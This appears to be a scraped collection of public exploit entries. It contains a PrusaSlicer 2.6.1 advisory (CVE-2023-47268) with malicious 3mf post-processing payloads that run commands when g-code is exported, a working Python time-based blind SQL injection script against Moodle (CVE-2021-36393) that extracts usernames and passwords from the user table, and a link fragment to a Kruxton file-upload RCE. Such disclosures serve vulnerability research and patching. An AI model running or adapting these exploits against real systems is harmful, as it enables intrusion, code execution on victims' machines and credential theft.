[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/kruxton-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/04/kruxton-10-fileupload-rce.html) ## Time spent: 00:15:00 </code></pre>

<pre><code># Exploit Title: PrusaSlicer 2.6.1 - Arbitrary code execution on g-code export # Date: 16/01/2024 # Exploit Author: Kamil Breński # Vendor Homepage: https://www.prusa3d.com # Software Link: https://github.com/prusa3d/PrusaSlicer # Version: PrusaSlicer up to and including version 2.6.1 # Tested on: Windows and Linux # CVE: CVE-2023-47268 ========================================================================================== 1.) 3mf Metadata extension ========================================================================================== PrusaSlicer 3mf project (zip) archives contain the 'Metadata/Slic3r_PE.config' file which describe various project settings, this is an extension to the regular 3mf file. PrusaSlicer parses this additional file to read various project settings. One of the settings (post_process) is the post-processing script (https://help.prusa3d.com/article/post-processing-scripts_283913) this feature has great potential for abuse as it allows a malicious user to create an evil 3mf project that will execute arbitrary code when the targeted user exports g-code from the malicious project. A project file needs to be modified with a prost process script setting in order to execute arbitrary code, this is demonstrated on both a Windows and Linux host in the following way. ========================================================================================== 2.) PoC ========================================================================================== For the linux PoC, this CLI command is enough to execute the payload contained in the project. './prusa-slicer -s code-exec-linux.3mf'. After slicing, a new file '/tmp/hax' will be created. This particular PoC contains this 'post_process' entry in the 'Slic3r_PE.config' file: ``` ; post_process = "/usr/bin/id > /tmp/hax #\necho 'Here I am, executing arbitrary code on this host. Thanks for slicing (x_x)'>> /tmp/hax #" ``` Just slicing the 3mf using the `-s` flag is enough to start executing potentially malicious code. For the windows PoC with GUI, the malicious 3mf file needs to be opened as a project file (or the settings imported). After exporting, a pop-up executed by the payload will appear. The windows PoC contains this entry: ``` ; post_process = "C:\\Windows\\System32\\cmd.exe /c msg %username% Here I am, executing arbitrary code on this host. Thanks for slicing (x_x) " ``` </code></pre>

<pre><code># Exploit Title: Moodle Authenticated Time-Based Blind SQL Injection - "sort" Parameter # Google Dork: # Date: 04/11/2023 # Exploit Author: Julio Ángel Ferrari (Aka. T0X1Cx) # Vendor Homepage: https://moodle.org/ # Software Link: # Version: 3.10.1 # Tested on: Linux # CVE : CVE-2021-36393 import requests import string from termcolor import colored # Request details URL = "http://127.0.0.1:8080/moodle/lib/ajax/service.php?sesskey=ZT0E6J0xWe&info=core_course_get_enrolled_courses_by_timeline_classification" HEADERS = { "Accept": "application/json, text/javascript, */*; q=0.01", "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.91 Safari/537.36", "Origin": "http://127.0.0.1:8080", "Referer": "http://127.0.0.1:8080/moodle/my/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Cookie": "MoodleSession=5b1rk2pfdpbcq2i5hmmern1os0", "Connection": "close" } # Characters to test characters_to_test = string.ascii_lowercase + string.ascii_uppercase + string.digits + "!@#$^&*()-_=+[]{}|;:'\",.<>?/" def test_character(payload): response = requests.post(URL, headers=HEADERS, json=[payload]) return response.elapsed.total_seconds() >= 3 def extract_value(column, label): base_payload = { "index": 0, "methodname": "core_course_get_enrolled_courses_by_timeline_classification", "args": { "offset": 0, "limit": 0, "classification": "all", "sort": "", "customfieldname": "", "customfieldvalue": "" } } result = "" for _ in range(50): # Assumes a maximum of 50 characters for the value character_found = False for character in characters_to_test: if column == "database()": base_payload["args"]["sort"] = f"fullname OR (database()) LIKE '{result + character}%' AND SLEEP(3)" else: base_payload["args"]["sort"] = f"fullname OR (SELECT {column} FROM mdl_user LIMIT 1 OFFSET 0) LIKE '{result + character}%' AND SLEEP(3)" if test_character(base_payload): result += character print(colored(f"{label}: {result}", 'red'), end="\r") character_found = True break if not character_found: break # Print the final result print(colored(f"{label}: {result}", 'red')) if __name__ == "__main__": extract_value("database()", "Database") extract_value("username", "Username") extract_value("password", "Password") </code></pre>